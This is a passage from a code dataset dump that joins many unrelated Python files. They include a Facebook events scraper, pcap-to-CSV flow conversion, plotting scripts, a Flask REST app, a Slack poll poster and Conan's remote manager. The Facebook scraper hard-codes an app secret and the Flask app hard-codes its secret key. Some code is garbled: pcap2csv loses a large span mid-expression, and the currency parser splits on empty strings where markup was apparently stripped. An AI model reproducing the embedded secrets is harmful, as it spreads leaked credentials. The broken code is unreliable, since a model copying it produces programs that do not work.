)\n\n    model.save_weights(model_path)\n\ndef report_model(model_path, baseline_path, val_ratio=0.1, EMBEDDING_SIZE=50):\n    my_path = os.path.abspath(os.path.dirname(__file__))\n    if not os.path.isdir(os.path.join(my_path, '../report')):\n        os.makedirs(os.path.join(my_path, '../report'))\n    report_path = os.path.join(my_path, '../report')\n    (MSE, AUC) = offline_eval(model_path, val_ratio, EMBEDDING_SIZE)\n    # # print(MSE, AUC)\n    (MSE_old, AUC_old) = offline_eval(baseline_path, val_ratio, EMBEDDING_SIZE)\n    with open(os.path.join(my_path, '../report/compare.csv'), 'w', newline='') as file:\n        writer = csv.writer(file)\n        writer.writerow([\"model version\", \"MSE\", \"AUC\"])\n        writer.writerow([\"model\", MSE, AUC])\n        writer.writerow([\"baseline\", MSE_old, AUC_old])\n\n\n    data_distribution(report_path, 
val_ratio)\n\n\n","sub_path":"model/train/train_utility.py","file_name":"train_utility.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"283839622","text":"\n\nfrom xai.brain.wordbase.nouns._egghead import _EGGHEAD\n\n#class header\nclass _EGGHEADS(_EGGHEAD, ):\n\tdef __init__(self,): \n\t\t_EGGHEAD.__init__(self)\n\t\tself.name = \"EGGHEADS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"egghead\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_eggheads.py","file_name":"_eggheads.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"173084870","text":"import urllib.request\nimport json\nimport datetime\nimport time\n\napp_id = \"197134180771589\"\napp_secret = \"28a3eaf06aa029934eb3e136e49fdf01\" # DO NOT SHARE WITH ANYONE!\npage_id = \"TrooperRocks\"\n\naccess_token = app_id + \"|\" + app_secret\n\ndef request_until_succeed(url):\n    req = urllib.request.Request(url)\n    success = False\n    while success is False:\n        try:\n            response = urllib.request.urlopen(req)\n            if response.getcode() == 200:\n                success = True\n        except Exception as e:\n            print(e)\n            time.sleep(5)\n\n            print(\"Error for URL %s: %s\" % (url, datetime.datetime.now()))\n            print(\"Retrying.\")\n\n    return response.read().decode(response.headers.get_content_charset())\n\ndef scrapeFacebookEvents(page_id):\n    # Construct the URL string; see http://stackoverflow.com/a/37239851 for\n    # Reactions parameters\n    url = 'https://graph.facebook.com/v2.6/'+page_id+'/events?access_token='+access_token\n\n    # retrieve data\n    #data = json.loads(request_until_succeed(url))\n\n    return request_until_succeed(url)\n","sub_path":"facebook_scrape_events.py","file_name":"facebook_scrape_events.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"578748494","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 2 12:54:01 2020\n\n@author: henry\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 12 10:07:03 2019\n\n@author: henry\n\"\"\"\n\nfrom __future__ import print_function, division\nfrom scapy.all import PcapReader\n\n\n#pcap_file_name=\"data/relay_stepstone-2019-09-11_12-50-38-sc1-1.pcap\"\n#pcap_file_name=\"DeepCorr_Data/Testdata/testdata1_relay_stepstone-2019-09-24_15-38-58-sc1-3.pcap\"\n#pcap_file_name=\"tunnel2_relay_stepstone-2019-09-16_16-19-44-sc1-3.pcap\"\n#pcap_file_name=\"ssh_stepping_stone_scaled/data/tunnel1_relay_stepstone-2019-09-16_16-14-50-sc1-532.pcap\"\n#filename=\"stepping_stone_pairs.csv\"\n\ndef pcap2csv(pcap_file_name, filename, caplength=300,starttime=12, chafflength=600):\n    \n    packets = PcapReader(pcap_file_name)\n    fid = open(filename+\"_Conv.txt\", 'a+')\n    fidChaff = open(filename+\"_Chaff.txt\", 'a+')\n\n    sizesup1=[]\n    sizesup2=[]\n    sizesdown1=[]\n    sizesdown2=[]\n    \n    timesup1=[]\n    timesup2=[]\n    timesdown1=[]\n    timesdown2=[]\n\n    i_sizesup1=-1\n    i_sizesup2=-1\n    i_sizesdown1=-1\n    i_sizesdown2=-1\n    \n    t_prev_up1=0\n    t_prev_up2=0\n    t_prev_down1=0\n    t_prev_down2=0\n    \n    i_Chaff1=0\n    i_Chaff2=0\n    Chaffpackets1=[]\n    Chaffpackets2=[]\n    \n    start_ip=\"238.7\"\n    steppst_ip=\"238.8\"\n    end_ip=\"238.9\"\n    name=pcap_file_name.split('/')[-1].split('.')[0]\n\n    i_total=0\n    i_written=0\n    open_flows = []\n    \n    for line in packets:\n        if not(line.name=='Ethernet'):\n            continue\n        t = line.time\n        line=line[1]\n        \n        
if not(line.name=='IP'): #\n continue\n if not(line.proto in [6]): #\n continue\n if line.payload.name=='Raw': \n continue\n \n #t = line.time\n length = line.len\n flags=str(line.flags)\n Src=str(line.src)[7:12]\n Dst=str(line.dst)[7:12]\n \n if (line.proto in [6])&('22' in [str(line.sport),str(line.dport)]):\n if (Src in [start_ip, steppst_ip, end_ip])&(Dst in [start_ip, steppst_ip, end_ip]):\n five_tuple = tuple([line.proto, Src + ':' + str(line.sport), Dst + ':' + str(line.dport)])\n else:\n# print(\"What?!?\")\n# print(line.proto)\n# print(line.sport)\n# print(line.dport)\n# print(Src)\n# print(Dst)\n continue\n if not(five_tuple in open_flows) and not(tuple([five_tuple[0],five_tuple[2],five_tuple[1]]) in open_flows):\n open_flows.append(five_tuple)\n \n if len(open_flows)>2:\n print(\"too many connections\")\n fid.close() \n return 0\n\n if i_total==0:\n t_start=t\n i_total+=1\n continue\n i_total+=1\n if t-t_start start to process pcap_file_name: [%s]\"%(pcap_file_name))\n pcap2csv(pcap_file_name,filename,caplength,starttime)\n\n\nif __name__ == \"__main__\":\n import argparse\n \n #filename=\"stepping_stone_pairs.csv\"\n caplength=300\n starttime=5\n\n parser = argparse.ArgumentParser(description='convert txt file to flows')\n parser.add_argument('-p', '--pcap', default=None,\n help='specify the pcap file you want to process')\n parser.add_argument('-f', '--folder', default=None,\n help='specify the folder you want to loop through')\n parser.add_argument('-n', '--name', default=None,\n help='specify the output filename')\n args = parser.parse_args()\n \n filename=args.name\n \n if args.pcap:\n pcap2csv(args.pcap, args.pcap.rsplit('.pcap')[0] + '.csv',caplength,starttime)\n elif args.folder:\n loop_folder(args.folder, filename,caplength,starttime)\n else:\n parser.print_help()","sub_path":"DetGenExt/SecureComm/src/Flowfunctions/Flowstats_new.py","file_name":"Flowstats_new.py","file_ext":"py","file_size_in_byte":10577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"362387560","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 1: YOLOv2, 2: AlexNet, 3: VGG-16, 4: GoogLeNet\nmodel = 1\n\ndfs = pd.read_excel(\"t.xlsx\", sheet_name=None, header=None)\nif model == 1:\n ms = \"YOLOv2\"\nelif model == 2:\n ms = \"AlexNet\"\nelif model == 3:\n ms = \"VGG-16\"\nelif model == 4:\n ms = \"GoogLeNet\"\nsh = dfs[\"Memory\"]\nprint(sh)\n\n\nlabels = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\"]\nx = np.arange(len(labels))\n\nplt.rcParams.update({\"font.size\": 13})\nfig, ax = plt.subplots()\nplt.subplots_adjust(top=0.95, right=0.95)\n\n# Workaround for this: https://bugs.python.org/issue32790\ndef fmtFlt(f, digits):\n s = (\"{:#.\" + str(digits) + \"g}\").format(f)\n sz = len(s) - 1\n if sz < digits:\n s += \"0\"\n if s[-1] == \".\":\n s = s[:-1]\n return s\n\ndef autolabel(rects):\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for rect in rects:\n height = rect.get_height()\n ax.annotate(fmtFlt(height, 3),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n\ndef addData():\n y = []\n for i in range(0, 6):\n y.append(-sh[i + 1][model] + sh[1][model])\n y = np.array(y) / 1000\n g = ax.bar(x, y)\n #g = ax.plot(x, y)\n\n autolabel(g)\n\naddData()\n\n\n#plt.ylim(plt.ylim()*1.1)\nybot, ytop = plt.ylim()\nplt.ylim(ybot, ytop*1.05)\nax.set_xlabel(\"Number of 
devices\")\nax.set_ylabel(\"Memory savings over one device [MB]\")\nax.set_xticks(x)\nax.set_xticklabels(labels)\n\nplt.savefig(\"plot_mem.pdf\")\nplt.show()\n","sub_path":"scripts/plotmem.py","file_name":"plotmem.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"589583000","text":"#!/usr/bin/python\nfrom __future__ import print_function\nimport sortphotos\n\nSCAN_DIR = '/media/MEDIA1/Alex-Photos/Unsorted'\nPHOTO_DIR = '/media/MEDIA1/Alex-Photos'\n\n\ndef main():\n sort_photos(SCAN_DIR,PHOTO_DIR)\n\ndef sort_photos(src_dir,dest_dir):\n \"\"\" Use the sort photos library from \n https://github.com/andrewning/sortphotos\n to do the actual sorting\n \"\"\"\n sort_format='%Y/%m-%b'\n rename_format=None\n\n sortphotos.sortPhotos(src_dir, dest_dir, sort_format, rename_format, recursive=True,\n copy_files=False, test=False, remove_duplicates=True, day_begins=0,\n additional_groups_to_ignore=['File'], additional_tags_to_ignore=[],\n use_only_groups=None, use_only_tags=None, verbose=False)\n \nif __name__ == '__main__':\n main()\n","sub_path":"alexPhotoSort.py","file_name":"alexPhotoSort.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"395021075","text":"\"\"\"\nThe utils module contains helper functions.\n\"\"\"\nimport pandas as pd\nimport logging\n\nlogger = logging.getLogger(__name__)\n\ndef index_to_datetime(index, unit='s', origin='unix'):\n \"\"\"\n Convert DataFrame index from int/float to datetime,\n rounds datetime to the nearest millisecond\n \n Parameters\n --------------\n index : pandas Index\n DataFrame index in int or float \n \n unit : str (optional)\n Units of the original index\n \n origin : str\n Reference date used to define the starting time.\n If origin = 'unix', the start time is '1970-01-01 00:00:00'\n The origin can also be defined using a datetime string in a similar \n format (i.e. 
'2019-05-17 16:05:45')\n \n Returns\n ----------\n pandas Index\n DataFrame index in datetime\n \"\"\"\n \n index2 = pd.to_datetime(index, unit=unit, origin=origin)\n index2 = index2.round('ms') # round to nearest milliseconds\n \n return index2\n\ndef datetime_to_elapsedtime(index, origin=0.0):\n \"\"\"\n Convert DataFrame index from datetime to elapsed time in seconds\n \n Parameters\n --------------\n index : pandas Index\n DataFrame index in datetime\n \n origin : float\n Reference for elapsed time\n \n Returns\n ----------\n pandas Index\n DataFrame index in elapsed seconds\n \"\"\"\n\n index2 = index - index[0]\n index2 = index2.total_seconds() + origin\n \n return index2\n\ndef datetime_to_clocktime(index):\n \"\"\"\n Convert DataFrame index from datetime to clocktime (seconds past midnight)\n \n Parameters\n --------------\n index : pandas Index\n DataFrame index in datetime\n \n Returns\n ----------\n pandas Index\n DataFrame index in clocktime\n \"\"\"\n \n clocktime = index.hour*3600 + index.minute*60 + index.second + index.microsecond/1e6\n \n return clocktime\n \ndef datetime_to_epochtime(index):\n \"\"\"\n Convert DataFrame index from datetime to epoch time\n \n Parameters\n --------------\n index : pandas Index\n DataFrame index in datetime\n \n Returns\n ----------\n pandas Index\n DataFrame index in epoch time\n \"\"\"\n \n index2 = index.astype('int64')/10**9\n \n return index2\n\ndef round_index(index, frequency, how='nearest'):\n \"\"\"\n Round DataFrame index\n \n Parameters\n ----------\n index : pandas Index\n Datetime index\n \n frequency : int\n Expected time series frequency, in seconds\n \n how : string (optional)\n Method for rounding, default = 'nearest'. Options include:\n \n * nearest = round the index to the nearest frequency\n \n * floor = round the index to the smallest expected frequency\n \n * ceiling = round the index to the largest expected frequency \n \n Returns\n -------\n pandas Datarame\n Data with rounded datetime index\n \"\"\"\n\n window_str=str(int(frequency*1e3)) + 'ms' # milliseconds\n \n if how=='nearest':\n rounded_index = index.round(window_str)\n elif how=='floor':\n rounded_index = index.floor(window_str)\n elif how=='ceiling':\n rounded_index = index.ceil(window_str)\n else:\n logger.info(\"Invalid input, index not rounded\")\n rounded_index = index\n\n return rounded_index\n","sub_path":"pecos/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"385548982","text":"import logging\nfrom typing import *\n\nimport requests\n\nlog = logging.getLogger(__name__)\nAPI_URL = 'https://slack.com/api/chat.command'\nCOMMAND = '/poll'\n\n\ndef post_poll(options: List[str], slack_token: str, slack_channel: str):\n if not slack_token or not slack_channel:\n log.error('You need to provide --slack-token and --slack-channel '\n 'to send the menu to slack.')\n return\n\n log.debug(f'Posting poll with options: {options}')\n options_str = '\\n'.join(f'\"{o}\"' for o in (raw.replace('\"', '\\'') for raw in options))\n poll_text = f'''\"Kam na oběd?\" {options_str}'''\n\n log.debug(f'Slack-formatted message: {poll_text}')\n\n params = {\n 'data': API_URL,\n 'token': slack_token,\n 'channel': slack_channel,\n 'command': COMMAND,\n 'text': poll_text\n }\n requests.post(API_URL, 
params=params)\n","sub_path":"prglunch/slack.py","file_name":"slack.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"388835605","text":"def currency_rates(currency):\n import requests\n import datetime\n currency = currency.upper()\n response = requests.get('http://www.cbr.ru/scripts/XML_daily.asp')\n content = response.content.decode(encoding=response.encoding)\n\n for el in content.split('')[1:]\n rate = rate[0].split('<')\n rate = float(rate[0].replace(',', '.'))\n if 'Date' in el:\n data = (el.split('Date=\"')[1]).split('\"')[0]\n data = data.split('.')\n date = datetime.datetime(year=int(data[2]), month=int(data[1]), day=int(data[0]))\n return rate, date","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"335418618","text":"import os\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\ndef cal_tempo_and_velocity_by_beat(features):\n tempos = []\n velocities = []\n prev_beat = 0\n\n tempo_saved = 0\n num_added = 0\n max_velocity = 0\n velocity_saved = 0\n momentum = 0.8\n for feat in features:\n if feat.qpm is None:\n continue\n cur_beat = feat.beat_index\n if cur_beat > prev_beat and num_added > 0:\n tempo = tempo_saved / num_added\n velocity = (velocity_saved / num_added + max_velocity) / 2\n\n if len(tempos)> 0:\n tempo = tempos[-1] * momentum + tempo * (1-momentum)\n velocity = velocities[-1] * momentum + velocity * (1 - momentum)\n tempos.append(tempo)\n velocities.append(velocity)\n tempo_saved = 0\n num_added = 0\n max_velocity = 0\n velocity_saved = 0\n\n\n tempo_saved += 10 ** feat.qpm\n velocity_saved += feat.velocity\n num_added += 1\n max_velocity = max(max_velocity, feat.velocity)\n prev_beat = cur_beat\n\n if num_added > 0:\n tempo = tempo_saved / num_added\n tempos.append(tempo)\n velocities.append(max_velocity)\n\n return tempos, velocities\n\n\n\ndef plot_performance_worm(features, save_name='images/performance_worm.png'):\n tempos, velocities = cal_tempo_and_velocity_by_beat(features)\n # data_points = []\n # num_data = len(tempos)\n #\n # for i in range(num_data):\n # data = [tempos[i], velocities[i]]\n # data_points.append(data)\n # plot data\n num_beat = len(tempos)\n plt.figure(figsize=(10, 7))\n for i in range(num_beat):\n ratio = i / num_beat\n plt.plot(tempos[i], velocities[i], markersize=(7 + 7*ratio), marker='o', color='green', alpha=0.05+ratio*0.8)\n if i > 0:\n plt.plot(tempos[i-1:i+1], velocities[i-1:i+1], color='green', alpha=0.05+ratio*0.8)\n plt.savefig(save_name)\n plt.close()\n","sub_path":"performanceWorm.py","file_name":"performanceWorm.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"47084044","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 23 13:09:05 2017\n\n@author: jadelson\n\"\"\"\nsat = 'l8'\nbase_dir = '/scratch/jadelson/'\nworking_dir = './'\nprint('Initialization sat: ' + sat)\nif sat == 'l8':\n sat_keys = [ 'LAT', 'LON', 'RHOW_443', 'RHOW_483', 'RHOW_561', 'RHOW_655', 'RHOW_865'] #Landsat 8\n sat_test_key = 'RHOW_655'\n raw_sat_directory = base_dir + 'landsat_order/landsat8_convert/'\n wind_data_file = base_dir + 'weather_data/weather_data_2014-2017.dk'\n sat_start_date = 2014\nif sat == 'l7':\n sat_keys = [ 'LAT', 'LON', 'RHOW_479', 'RHOW_561', 
'RHOW_661', 'RHOW_835'] #Landsat 7\n    sat_test_key = 'RHOW_661'\n    raw_sat_directory = base_dir + 'landsat_order/landsat7_convert/'\n    wind_data_file = base_dir + 'weather_data/weather_data_2000-2017.dk'\n    sat_start_date = 2000\n\n\nsat_tide_directory = base_dir + 'sat_and_rusty/'\nwind_sat_tide_directory = base_dir + 'wind_sat_and_rusty/'\nstress_sat_directory = base_dir + 'stress_sat/'\nfetch_file = sat + '_savedfetchmodel.dk'\nsat_filter_directory = base_dir + 'sat_on_mesh/'\n\n\n\n\n","sub_path":"init_builder.py","file_name":"init_builder.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"613068173","text":"from flask import Flask, render_template\nfrom flask_restful import Api\nfrom flask_jwt import JWT\n\nfrom security import authenticate, identity\n\nfrom resources.user import UserRegister, ViewAllUsers\nfrom resources.researchtopics import ResearchTopic, ResearchTopics, ResearchTopicID, ResearchTopicNew, ResearchTopicIDEdit, ResearchTopicsByUser\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = \"scgxXrAooDc9dQMQLkThoryc\"\napi = Api(app)\n\njwt = JWT(app, authenticate, identity) # /auth\n\n@app.route('/')\ndef index():\n    return \"Hello world!\"\n\n@app.route(\"/list\")\ndef list():\n    return render_template('list.html')\n\n# Research Topics APIs\napi.add_resource(ResearchTopic, '/research/')\napi.add_resource(ResearchTopics, '/research')\napi.add_resource(ResearchTopicID, '/research/id/')\napi.add_resource(ResearchTopicsByUser, '/research/user/')\napi.add_resource(ResearchTopicNew, '/research/new')\napi.add_resource(ResearchTopicIDEdit, '/research/id//update')\n\n# Manage User APIs\napi.add_resource(UserRegister, '/register')\napi.add_resource(ViewAllUsers, '/viewallusers')\n\nif __name__ == '__main__':\n    from db import db\n    db.init_app(app)\n    app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"72061922","text":"import os\nimport traceback\n\nimport shutil\nimport time\nfrom requests.exceptions import ConnectionError\n\nfrom conans import DEFAULT_REVISION_V1\nfrom conans.client.cache.remote_registry import Remote\nfrom conans.client.source import merge_directories\nfrom conans.errors import ConanConnectionError, ConanException, NotFoundException, \\\n    NoRestV2Available, PackageNotFoundException\nfrom conans.paths import EXPORT_SOURCES_DIR_OLD, \\\n    EXPORT_SOURCES_TGZ_NAME, EXPORT_TGZ_NAME, PACKAGE_TGZ_NAME, rm_conandir\nfrom conans.search.search import filter_packages\nfrom conans.util import progress_bar\nfrom conans.util.env_reader import get_env\nfrom conans.util.files import make_read_only, mkdir, rmdir, tar_extract, touch_folder\nfrom conans.util.log import logger\n# FIXME: Eventually, when all output is done, tracer functions should be moved to the recorder class\nfrom conans.util.tracer import (log_package_download,\n                                log_recipe_download, log_recipe_sources_download,\n                                log_uncompressed_file)\n\n\nclass RemoteManager(object):\n    \"\"\" Will handle the remotes to get recipes, packages etc \"\"\"\n\n    def __init__(self, cache, auth_manager, output, hook_manager):\n        self._cache = cache\n        self._output = output\n        self._auth_manager = auth_manager\n        self._hook_manager = hook_manager\n\n    def check_credentials(self, remote):\n        self._call_remote(remote, \"check_credentials\")\n\n    def get_recipe_snapshot(self, ref, 
remote):\n assert ref.revision, \"get_recipe_snapshot requires revision\"\n return self._call_remote(remote, \"get_recipe_snapshot\", ref)\n\n def get_package_snapshot(self, pref, remote):\n assert pref.ref.revision, \"upload_package requires RREV\"\n assert pref.revision, \"get_package_snapshot requires PREV\"\n return self._call_remote(remote, \"get_package_snapshot\", pref)\n\n def upload_recipe(self, ref, files_to_upload, deleted, remote, retry, retry_wait):\n assert ref.revision, \"upload_recipe requires RREV\"\n self._call_remote(remote, \"upload_recipe\", ref, files_to_upload, deleted,\n retry, retry_wait)\n\n def upload_package(self, pref, files_to_upload, deleted, remote, retry, retry_wait):\n assert pref.ref.revision, \"upload_package requires RREV\"\n assert pref.revision, \"upload_package requires PREV\"\n self._call_remote(remote, \"upload_package\", pref,\n files_to_upload, deleted, retry, retry_wait)\n\n def get_recipe_manifest(self, ref, remote):\n ref = self._resolve_latest_ref(ref, remote)\n return self._call_remote(remote, \"get_recipe_manifest\", ref), ref\n\n def get_package_manifest(self, pref, remote):\n pref = self._resolve_latest_pref(pref, remote)\n return self._call_remote(remote, \"get_package_manifest\", pref), pref\n\n def get_package_info(self, pref, remote):\n \"\"\" Read a package ConanInfo from remote\n \"\"\"\n pref = self._resolve_latest_pref(pref, remote)\n return self._call_remote(remote, \"get_package_info\", pref), pref\n\n def get_recipe(self, ref, remote):\n \"\"\"\n Read the conans from remotes\n Will iterate the remotes to find the conans unless remote was specified\n\n returns (dict relative_filepath:abs_path , remote_name)\"\"\"\n\n self._hook_manager.execute(\"pre_download_recipe\", reference=ref, remote=remote)\n dest_folder = self._cache.package_layout(ref).export()\n rmdir(dest_folder)\n\n ref = self._resolve_latest_ref(ref, remote)\n\n t1 = time.time()\n zipped_files = self._call_remote(remote, \"get_recipe\", ref, dest_folder)\n duration = time.time() - t1\n log_recipe_download(ref, duration, remote.name, zipped_files)\n\n unzip_and_get_files(zipped_files, dest_folder, EXPORT_TGZ_NAME, output=self._output)\n # Make sure that the source dir is deleted\n package_layout = self._cache.package_layout(ref)\n rm_conandir(package_layout.source())\n touch_folder(dest_folder)\n conanfile_path = package_layout.conanfile()\n\n with package_layout.update_metadata() as metadata:\n metadata.recipe.revision = ref.revision\n\n self._hook_manager.execute(\"post_download_recipe\", conanfile_path=conanfile_path,\n reference=ref, remote=remote)\n\n return ref\n\n def get_recipe_sources(self, ref, export_folder, export_sources_folder, remote):\n assert ref.revision, \"get_recipe_sources requires RREV\"\n t1 = time.time()\n\n zipped_files = self._call_remote(remote, \"get_recipe_sources\", ref, export_folder)\n if not zipped_files:\n mkdir(export_sources_folder) # create the folder even if no source files\n return\n\n duration = time.time() - t1\n log_recipe_sources_download(ref, duration, remote.name, zipped_files)\n\n unzip_and_get_files(zipped_files, export_sources_folder, EXPORT_SOURCES_TGZ_NAME,\n output=self._output)\n # REMOVE in Conan 2.0\n c_src_path = os.path.join(export_sources_folder, EXPORT_SOURCES_DIR_OLD)\n if os.path.exists(c_src_path):\n merge_directories(c_src_path, export_sources_folder)\n rmdir(c_src_path)\n touch_folder(export_sources_folder)\n\n def get_package(self, pref, dest_folder, remote, output, recorder):\n\n conanfile_path = 
self._cache.package_layout(pref.ref).conanfile()\n self._hook_manager.execute(\"pre_download_package\", conanfile_path=conanfile_path,\n reference=pref.ref, package_id=pref.id, remote=remote)\n output.info(\"Retrieving package %s from remote '%s' \" % (pref.id, remote.name))\n rm_conandir(dest_folder) # Remove first the destination folder\n t1 = time.time()\n try:\n pref = self._resolve_latest_pref(pref, remote)\n snapshot = self._call_remote(remote, \"get_package_snapshot\", pref)\n if not is_package_snapshot_complete(snapshot):\n raise PackageNotFoundException(pref)\n zipped_files = self._call_remote(remote, \"get_package\", pref, dest_folder)\n\n with self._cache.package_layout(pref.ref).update_metadata() as metadata:\n metadata.packages[pref.id].revision = pref.revision\n metadata.packages[pref.id].recipe_revision = pref.ref.revision\n\n duration = time.time() - t1\n log_package_download(pref, duration, remote, zipped_files)\n unzip_and_get_files(zipped_files, dest_folder, PACKAGE_TGZ_NAME, output=self._output)\n # Issue #214 https://github.com/conan-io/conan/issues/214\n touch_folder(dest_folder)\n if get_env(\"CONAN_READ_ONLY_CACHE\", False):\n make_read_only(dest_folder)\n recorder.package_downloaded(pref, remote.url)\n output.success('Package installed %s' % pref.id)\n except NotFoundException:\n raise PackageNotFoundException(pref)\n except BaseException as e:\n output.error(\"Exception while getting package: %s\" % str(pref.id))\n output.error(\"Exception: %s %s\" % (type(e), str(e)))\n try:\n output.warn(\"Trying to remove package folder: %s\" % dest_folder)\n rmdir(dest_folder)\n except OSError as e:\n raise ConanException(\"%s\\n\\nCouldn't remove folder '%s', might be busy or open. \"\n \"Close any app using it, and retry\" % (str(e), dest_folder))\n raise\n self._hook_manager.execute(\"post_download_package\", conanfile_path=conanfile_path,\n reference=pref.ref, package_id=pref.id, remote=remote)\n\n return pref\n\n def search_recipes(self, remote, pattern=None, ignorecase=True):\n \"\"\"\n Search exported conans information from remotes\n\n returns (dict str(ref): {packages_info}\"\"\"\n return self._call_remote(remote, \"search\", pattern, ignorecase)\n\n def search_packages(self, remote, ref, query):\n packages = self._call_remote(remote, \"search_packages\", ref, query)\n packages = filter_packages(query, packages)\n return packages\n\n def remove(self, ref, remote):\n \"\"\"\n Removed conans or packages from remote\n \"\"\"\n return self._call_remote(remote, \"remove\", ref)\n\n def remove_packages(self, ref, remove_ids, remote):\n \"\"\"\n Removed conans or packages from remote\n \"\"\"\n return self._call_remote(remote, \"remove_packages\", ref, remove_ids)\n\n def get_recipe_path(self, ref, path, remote):\n return self._call_remote(remote, \"get_recipe_path\", ref, path)\n\n def get_package_path(self, pref, path, remote):\n return self._call_remote(remote, \"get_package_path\", pref, path)\n\n def authenticate(self, remote, name, password):\n return self._call_remote(remote, 'authenticate', name, password)\n\n def get_recipe_revisions(self, ref, remote):\n return self._call_remote(remote, \"get_recipe_revisions\", ref)\n\n def get_package_revisions(self, pref, remote):\n revisions = self._call_remote(remote, \"get_package_revisions\", pref)\n return revisions\n\n def get_latest_recipe_revision(self, ref, remote):\n revision = self._call_remote(remote, \"get_latest_recipe_revision\", ref)\n return revision\n\n def get_latest_package_revision(self, pref, remote):\n 
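# Ask the remote for the newest available revision of the given package reference.\n        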
revision = self._call_remote(remote, \"get_latest_package_revision\", pref)\n return revision\n\n def _resolve_latest_ref(self, ref, remote):\n if ref.revision is None:\n try:\n ref = self.get_latest_recipe_revision(ref, remote)\n except NoRestV2Available:\n ref = ref.copy_with_rev(DEFAULT_REVISION_V1)\n return ref\n\n def _resolve_latest_pref(self, pref, remote):\n if pref.revision is None:\n try:\n pref = self.get_latest_package_revision(pref, remote)\n except NoRestV2Available:\n pref = pref.copy_with_revs(pref.ref.revision, DEFAULT_REVISION_V1)\n return pref\n\n def _call_remote(self, remote, method, *argc, **argv):\n assert(isinstance(remote, Remote))\n self._auth_manager.remote = remote\n try:\n return getattr(self._auth_manager, method)(*argc, **argv)\n except ConnectionError as exc:\n raise ConanConnectionError(\"%s\\n\\nUnable to connect to %s=%s\"\n % (str(exc), remote.name, remote.url))\n except ConanException as exc:\n exc.remote = remote\n raise\n except Exception as exc:\n logger.error(traceback.format_exc())\n raise ConanException(exc, remote=remote)\n\n\ndef is_package_snapshot_complete(snapshot):\n integrity = True\n for keyword in [\"conaninfo\", \"conanmanifest\", \"conan_package\"]:\n if not any(keyword in key for key in snapshot):\n integrity = False\n break\n return integrity\n\n\ndef check_compressed_files(tgz_name, files):\n bare_name = os.path.splitext(tgz_name)[0]\n for f in files:\n if f == tgz_name:\n continue\n if bare_name == os.path.splitext(f)[0]:\n raise ConanException(\"This Conan version is not prepared to handle '%s' file format. \"\n \"Please upgrade conan client.\" % f)\n\n\ndef unzip_and_get_files(files, destination_dir, tgz_name, output):\n \"\"\"Moves all files from package_files, {relative_name: tmp_abs_path}\n to destination_dir, unzipping the \"tgz_name\" if found\"\"\"\n\n tgz_file = files.pop(tgz_name, None)\n check_compressed_files(tgz_name, files)\n if tgz_file:\n uncompress_file(tgz_file, destination_dir, output=output)\n os.remove(tgz_file)\n\n\ndef uncompress_file(src_path, dest_folder, output):\n t1 = time.time()\n try:\n with progress_bar.open_binary(src_path, desc=\"Decompressing %s\" % os.path.basename(src_path),\n output=output) as file_handler:\n tar_extract(file_handler, dest_folder)\n except Exception as e:\n error_msg = \"Error while downloading/extracting files to %s\\n%s\\n\" % (dest_folder, str(e))\n # try to remove the files\n try:\n if os.path.exists(dest_folder):\n shutil.rmtree(dest_folder)\n error_msg += \"Folder removed\"\n except Exception:\n error_msg += \"Folder not removed, files/package might be damaged, remove manually\"\n raise ConanException(error_msg)\n\n duration = time.time() - t1\n log_uncompressed_file(src_path, duration, dest_folder)\n","sub_path":"conans/client/remote_manager.py","file_name":"remote_manager.py","file_ext":"py","file_size_in_byte":12780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"252932818","text":"from dronekit import connect, VehicleMode,LocationGlobalRelative,APIException\nimport time\nimport socket\nimport exceptions\nimport math\nimport argparse\nfrom pymavlink import mavutil\n######FUNCTIONS#######\n#create vehicle object with arg of drone host on port 5760 or 14550\ndef connectMyCopter():\n parser = argparse.ArgumentParser(description='commands')\n parser.add_argument('--connect')\n args = parser.parse_args()\n connection_string = args.connect\n #use simulated drone if no args specified\n vehicle = connect(connection_string, 
